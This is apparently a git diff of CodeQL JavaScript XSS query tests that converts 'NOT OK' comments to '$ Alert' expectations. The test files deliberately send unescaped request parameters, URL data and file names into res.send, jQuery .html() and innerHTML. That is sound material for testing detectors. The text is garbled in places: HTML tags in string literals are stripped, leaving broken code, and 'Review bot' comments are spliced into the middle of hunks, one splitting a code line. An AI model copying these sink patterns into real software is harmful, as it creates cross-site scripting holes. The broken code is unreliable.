@@ -1,14 +1,14 @@ var foo = document.getElementById("foo"); var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); -foo.setAttribute("src", data.src); // NOT OK -foo.setAttribute("HREF", data.p); // NOT OK -foo.setAttribute("width", data.w); // OK -foo.setAttribute("xlink:href", data.p) // NOT OK - -foo.setAttributeNS('xlink', 'href', data.p); // NOT OK -foo.setAttributeNS('foobar', 'href', data.p); // NOT OK -foo.setAttributeNS('baz', 'width', data.w); // OK +foo.setAttribute("src", data.src); // $ Alert +foo.setAttribute("HREF", data.p); // $ Alert +foo.setAttribute("width", data.w); +foo.setAttribute("xlink:href", data.p) // $ Alert + +foo.setAttributeNS('xlink', 'href', data.p); // $ Alert +foo.setAttributeNS('foobar', 'href', data.p); // $ Alert +foo.setAttributeNS('baz', 'width', data.w); for (var p in data) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index d434ddf20e8e..a1302d196a7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -22,7 +22,7 @@ }, templates: { suggestion: function(val) { - return val; // NOT OK + return val; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index f35e603228d6..957fe1ba0497 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,15 +1,15 @@ function test() { let tainted = document.location.search; - $("
" + tainted + "
"); // NOT OK - $(`
${tainted}
`); // NOT OK - $("
".concat(tainted).concat("
")); // NOT OK - $(["
", tainted, "
"].join()); // NOT OK + $("
" + tainted + "
"); // $ Alert + $(`
${tainted}
`); // $ Alert + $("
".concat(tainted).concat("
")); // $ Alert + $(["
", tainted, "
"].join()); // $ Alert - $("
"); // NOT OK - $(`
`); // NOT OK - $("
")); // NOT OK - $(["
"].join()); // NOT OK + $("
"); // $ Alert + $(`
`); // $ Alert + $("
")); // $ Alert + $(["
"].join()); // $ Alert function indirection1(attrs) { return '
' + content + '
'; @@ -17,6 +17,6 @@ function test() { function indirection2(attrs) { return '
'.concat(content)).concat('
'); } - $(indirection1(document.location.search.attrs)); // NOT OK - $(indirection2(document.location.search.attrs)); // NOT OK + $(indirection1(document.location.search.attrs)); // $ Alert + $(indirection2(document.location.search.attrs)); // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js index 36dd5181a1b5..43c6618430e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js @@ -8,7 +8,7 @@ ajv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollDat app.post('/polldata', (req, res) => { if (!ajv.validate('pollData', req.body)) { - res.send(ajv.errorsText()); // NOT OK + res.send(ajv.errorsText()); // $ Alert } }); @@ -21,6 +21,6 @@ const joiSchema = joi.object().keys({ app.post('/votedata', (req, res) => { const val = joiSchema.validate(req.body); if (val.error) { - res.send(val.error); // NOT OK + res.send(val.error); // $ Alert } }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index 150b9e204fda..f8a3d5c09486 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js 
@@ -8,31 +8,31 @@ try { unknown(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { inner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown(foo + "bar"); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown({ prop: foo }); } catch (e) { - $('myId').html(e); // NOT OK! - but not detected due to not tainting object that have a tainted propety. [INCONSISTENCY] + $('myId').html(e); // $ MISSING: Alert - - but not detected due to not tainting object that have a tainted propety. } try { unknown(["bar", foo]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } function deep(x) { @@ -45,13 +45,13 @@ try { deep("bar" + foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { var tmp = "bar" + foo; } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function safe(x) { @@ -61,13 +61,13 @@ try { safe(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { safe.call(null, foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } var myWeirdInner; try { @@ -75,12 +75,12 @@ inner(x); } } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { myWeirdInner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } $('myId').html(foo); // Direct leak, reported by other query. @@ -88,13 +88,13 @@ try { unknown(foo.match(/foo/)); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown([foo, "bar"]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { @@ -104,7 +104,7 @@ // nothing } } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } }); 
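Review bot: The new expectation comment on the `unknown({ prop: foo })` catch block has a doubled separator and a typo, `// $ MISSING: Alert - - but not detected due to not tainting object that have a tainted propety.`, while every other comment in this hunk uses a single ` - `; it should read `$('myId').html(e); // $ MISSING: Alert - not detected because an object with a tainted property is not itself tainted`. The text after ` - ` is presumably ignored by the inline-expectations framework, so this is wording only, but it is the one line that breaks the otherwise uniform pattern. The try/catch sequence this line belongs to starts before the hunk.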
@@ -116,7 +116,7 @@ app.get('/user/:id', function (req, res) { try { unknown(req.params.id); } catch (e) { - res.send("Exception: " + e); // NOT OK! + res.send("Exception: " + e); // $ Alert } }); @@ -127,7 +127,7 @@ app.get('/user/:id', function (req, res) { try { unknown(sessionStorage.getItem('exceptionSession')); } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } })(); @@ -135,10 +135,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert return; } - $('myId').html(res); // OK (for now?) + $('myId').html(res); // OK - for now? }); }); @@ -146,25 +146,25 @@ app.get('/user/:id', function (req, res) { var foo = document.location.search; new Promise(resolve => unknown(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); try { null[foo]; } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } try { unknown()[foo]; } catch (e) { - $('myId').html(e); // OK. We are not sure that `unknown()` is null-ish. + $('myId').html(e); // OK - We are not sure that `unknown()` is null-ish. } try { "foo"[foo] } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function inner(tainted, resolve) { @@ -172,16 +172,16 @@ app.get('/user/:id', function (req, res) { } new Promise(resolve => inner(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); })(); app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert } - $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. + $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. }); }); 
@@ -189,7 +189,7 @@ app.get('/user/:id', function (req, res) { try { res.send(req.params.id); } catch(err) { - res.send(err); // OK (the above `res.send()` is already reported by js/xss) + res.send(err); // OK - (the above `res.send()` is already reported by js/xss) } }); @@ -210,7 +210,7 @@ var fs = require("fs"); log.info(foo); localStorage.setItem(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index c3b1cbc2da8a..ef82f644a049 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -4,8 +4,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // BAD: a request parameter is incorporated without validation into the response - res.send("Unknown user: " + req.params.id); + res.send("Unknown user: " + req.params.id); // $ Alert - a request parameter is incorporated without validation into the response moreBadStuff(req.params, res); } else { // TODO: do something exciting 
@@ -14,32 +13,32 @@ app.get('/user/:id', function(req, res) { }); function moreBadStuff(params, res) { - res.send("Unknown user: " + params.id); // NOT OK + res.send("Unknown user: " + params.id); // $ Alert } var marked = require("marked"); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(marked(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(marked(req.body)); // $ Alert }); var table = require('markdown-table') app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert var mytable = table([ ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // NOT OK - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps }); var showdown = require('showdown'); var converter = new showdown.Converter(); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(converter.makeHtml(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(converter.makeHtml(req.body)); // $ Alert }); var unified = require('unified'); @@ -53,7 +52,7 @@ var sanitize = require("rehype-sanitize"); const { resetExtensions } = require('showdown'); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert unified() .use(markdown) 
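Review bot: The line `res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps` pairs an unconditional expectation with a note saying the result only appears under the old dataflow library. If the query still reports it, the FIXME is stale and should be dropped; if it does not, the tag should presumably be `$ MISSING: Alert` so the gap is documented instead of showing up as an unmet expectation. The old `// NOT OK` wording did not have to agree with a checked expectation, so this migration is the point at which the comment should say which case applies.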
@@ -62,17 +61,17 @@ app.get('/user/:id', function (req, res) { .use(format) .use(html) .process(req.body, function (err, file) { - res.send(file); // NOT OK + res.send(file); // $ Alert }); - res.send(remark().processSync(req.body).toString()); // NOT OK + res.send(remark().processSync(req.body).toString()); // $ Alert - res.send(remark().use(sanitize).processSync(req.body).toString()); // OK + res.send(remark().use(sanitize).processSync(req.body).toString()); - res.send(unified().use(markdown).processSync(req.body).toString); // NOT OK + res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert remark().process(req.body, (e, f) => { - res.send(f); // NOT OK + res.send(f); // $ Alert }) }); @@ -80,9 +79,9 @@ import snarkdown from 'snarkdown'; var snarkdown2 = require("snarkdown"); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(snarkdown(req.body)); // NOT OK - res.send(snarkdown2(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(snarkdown(req.body)); // $ Alert + res.send(snarkdown2(req.body)); // $ Alert }); const markdownIt = require('markdown-it')({ 
@@ -94,20 +93,20 @@ const markdownIt3 = require('markdown-it')({html: true}) .use(require('markdown-it-highlightjs')); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(markdownIt.render(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(markdownIt.render(req.body)); // $ Alert res.send(markdownIt2.render(req.body)); // OK - no html - res.send(markdownIt3.render(req.body)); // NOT OK + res.send(markdownIt3.render(req.body)); // $ Alert - res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. - res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // NOT OK + res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. + res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // $ Alert }); var Hapi = require('hapi'); var hapi = new Hapi.Server(); hapi.route({ handler: function (request){ - return request.query.p; // NOT OK + return request.query.p; // $ Alert }}); app.get("invalid/keys/:id", async (req, res) => { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js index 64acfded0a63..cf89f45b9692 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js @@ -7,7 +7,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is plain text } else { res.set('Content-Type', 'text/html'); - res.send("FOO: " + req.params.id); // NOT OK - content type is HTML. + res.send("FOO: " + req.params.id); // $ Alert - content type is HTML. } }); 
@@ -17,7 +17,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is JSON } else { res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. } }); @@ -36,10 +36,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { if (err) { res.statusCode = 404; - res.end("FOO: " + req.params.id); // NOT OK + res.end("FOO: " + req.params.id); // $ Alert } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -50,10 +50,10 @@ function textContentType() { app.get('/user/:id', function (req, res) { if (err) { res.header({'Content-Type': textContentType()}); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -67,13 +67,13 @@ app.get('/user/:id', function (req, res) { somethingMore(); while(Math.random()) {}; res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. }); app.get('/user/:id', function (req, res) { res.header({'Content-Type': textContentType()}); myFancyFunction(() => { - res.send("FOO: " + req.params.id); // OK + res.send("FOO: " + req.params.id); }); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js index c6635459f42f..a92226bff122 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js @@ -5,7 +5,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: request parameter is sanitized before incorporating it into the response + // OK - request parameter is sanitized before incorporating it into the response res.send("Unknown user: " + escape(req.params.id)); else // TODO: do something exciting @@ -15,13 +15,13 @@ app.get('/user/:id', function(req, res) { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: templating prevents XSS + // OK - templating prevents XSS res.render(invalidUserIdTemplate, { id: req.params.id }); }); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', 'text/plain'); res.send("Unknown user: " + req.params.id); } else @@ -35,7 +35,7 @@ function textContentType() { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', textContentType()); res.send("Unknown user: " + req.params.id); } else @@ -53,7 +53,7 @@ app.get('/echo', function(req, res) { app.get('/user/:id', function(req, res) { const url = req.params.id; if (!/["'&<>]/.exec(url)) { - res.send(url); // OK + res.send(url); } }); @@ -66,7 +66,7 @@ function escapeHtml1 (str) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK + res.send(escapeHtml1(url)); }); const matchHtmlRegExp = /["'&<>]/; @@ -82,6 +82,6 @@ function escapeHtml2 (string) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml2(url)); // OK + res.send(escapeHtml2(url)); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 2217ab783ac7..5ab9f9d6f265 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -134,9 +134,9 @@ function escapeHtml4(s) { app.get('/user/:id', function (req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK - res.send(escapeHtml2(url)); // OK - res.send(escapeHtml3(url)); // OK - but FP [INCONSISTENCY] - res.send(escapeHtml4(url)); // OK + res.send(escapeHtml1(url)); + res.send(escapeHtml2(url)); + res.send(escapeHtml3(url)); // $ SPURIOUS: Alert - FP + res.send(escapeHtml4(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js index c30ab48a511d..3fba93d3b4a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js @@ -5,6 +5,6 @@ var app = express(); app.use(cookieParser()); app.get('/cookie/:name', function(req, res) { - // OK + res.send("Here, have a cookie: " + req.cookies[req.params.name]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 45ad3a94920c..448f12270783 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -2,7 +2,7 @@ var express = require('express'); express().get('/user/', function(req, res) { var evil = req.query.evil; - res.send(console.log("
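Review bot: In cookies.js, replacing `// OK` with a blank line leaves `res.send("Here, have a cookie: " + req.cookies[req.params.name]);` with no indication of why a value read from the request and echoed into the response is expected not to alert, whereas the other files in this commit keep their reasons in the `// OK - <reason>` form. The hunk does not show why the query excludes this case, so I cannot supply the reason, but a trailing comment such as `// OK - <reason cookies are not treated as a source here>` would keep the negative test self-explaining. Without it a later reader may take the bare line for an oversight rather than a deliberate expectation.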
%s
", evil)); // OK (returns undefined) - res.send(util.format("
%s
", evil)); // NOT OK - res.send(require("printf")("
%s
", evil)); // NOT OK + res.send(console.log("
%s
", evil)); // OK - returns undefined + res.send(util.format("
%s
", evil)); // $ Alert + res.send(require("printf")("
%s
", evil)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index aed560fc0767..cd6ca0c9e3da 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -3,13 +3,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }); var params = { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 4b2edd4e4faf..105080e5fba2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -7,7 +7,7 @@ let app = express(); app.get("/some/path", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = sendResponse.bind(null, req.url); @@ -16,7 +16,7 @@ app.get("/some/path", (req, res) => { app.get("/underscore", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = underscore.partial(sendResponse, req.url); @@ -25,7 +25,7 @@ app.get("/underscore", (req, res) => { app.get("/lodash", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = lodash.partial(sendResponse, req.url); 
@@ -34,7 +34,7 @@ app.get("/lodash", (req, res) => { app.get("/ramda", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = R.partial(sendResponse, [req.url]); @@ -49,7 +49,7 @@ app.get("/return", (req, res) => { let callback = getFirst.bind(null, req.url); res.send(callback); // OK - the callback itself is not tainted - res.send(callback()); // NOT OK - but not currently detected [INCONSISTENCY] + res.send(callback()); // $ MISSING: Alert - not currently detected res.send(getFirst("Hello")); // OK - argument is not tainted from this call site }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index d48ec23af5f1..392a1f7ec612 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -3,9 +3,9 @@ let app = express(); app.get("/some/path", (req, res) => { new Promise((resolve, reject) => resolve(req.query.data)) - .then(x => res.send(x)); // NOT OK + .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) .then(x => escapeHtml(x)) - .then(x => res.send(x)); // OK + .then(x => res.send(x)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 60399a9b63d6..35021ea39120 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -4,8 +4,8 @@ var app = express(); app.get('/user/:id', function(req, res) { let { p, q: r } = req.params; - res.send(p); // NOT OK - res.send(r); // NOT OK + res.send(p); // $ Alert + res.send(r); // $ Alert }); const aKnownValue = "foo"; 
@@ -14,13 +14,13 @@ app.get('/bar', function(req, res) { let { p } = req.params; if (p == aKnownValue) - res.send(p); // OK - res.send(p); // NOT OK + res.send(p); + res.send(p); // $ Alert if (p != aKnownValue) - res.send(p); // NOT OK + res.send(p); // $ Alert else - res.send(p); // OK + res.send(p); }); @@ -33,8 +33,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = clone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const serializeJavaScript = require('serialize-javascript'); @@ -44,11 +44,11 @@ app.get('/baz', function(req, res) { var serialized = serializeJavaScript(p); - res.send(serialized); // OK + res.send(serialized); var unsafe = serializeJavaScript(p, {unsafe: true}); - res.send(unsafe); // NOT OK + res.send(unsafe); // $ Alert }); const fclone = require('fclone'); @@ -60,8 +60,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = fclone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const jc = require('json-cycle'); @@ -72,8 +72,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = jc.retrocycle(jc.decycle(obj)); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const sortKeys = require('sort-keys'); @@ -85,6 +85,6 @@ app.get('/baz', function(req, res) { obj.p = p; var other = sortKeys(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index c7d0fd91a4a0..61d153498e74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js 
@@ -3,11 +3,11 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { let { p } = req.params; - res.send(p); // NOT OK + res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { const code = prettier.format(reg.body, { semi: false, parser: "babel" }); - res.send(code); // NOT OK + res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index c04e0d784efc..be96d05a400a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -5,7 +5,7 @@ var express = require('express'); express().get('/', function(req, res) { fs.readdir("/myDir", function (error, files1) { - res.send(files1); // NOT OK + res.send(files1); // $ Alert }); }); @@ -23,18 +23,18 @@ http.createServer(function (req, res) { } fs.readdir("/myDir", function (error, files1) { - res.write(files1); // NOT OK + res.write(files1); // $ Alert var dirs = []; var files2 = []; files1.forEach(function (file) { files2.push(file); }); - res.write(files2); // NOT OK + res.write(files2); // $ Alert var files3 = format(files2); - res.write(files3); // NOT OK + res.write(files3); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index dcf530e3ef5c..4f712f2604e7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js 
@@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), name = torrent.name; - res.send(name); // NOT OK + res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index 6a133a747bdd..fb229199e687 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -5,11 +5,11 @@ factory(jQuery); } }(function ($) { - $("" + $.trim("foo") + ""); // OK + $("" + $.trim("foo") + ""); })); $.fn.myPlugin = function (stuff, options) { - $("#foo").html("" + options.foo + ""); // NOT OK + $("#foo").html("" + options.foo + ""); // $ Alert - $("#foo").html("" + stuff + ""); // NOT OK + $("#foo").html("" + stuff + ""); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 91e81238605a..9c48ed8c23f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 4e5e4730547e..3ec0e2007396 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,10 +1,10 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } export function objectStuff(settings: any, i: number) { - document.querySelector("#html").innerHTML = "" + settings + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; if (settings.mySetting && settings.mySetting.length !== 0) { @@ -15,7 +15,7 @@ export function objectStuff(settings: any, i: number) { name = ""; } - document.querySelector("#html").innerHTML = "" + name + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + name + ""; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index e28325ce0cf8..9566ce8468a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ 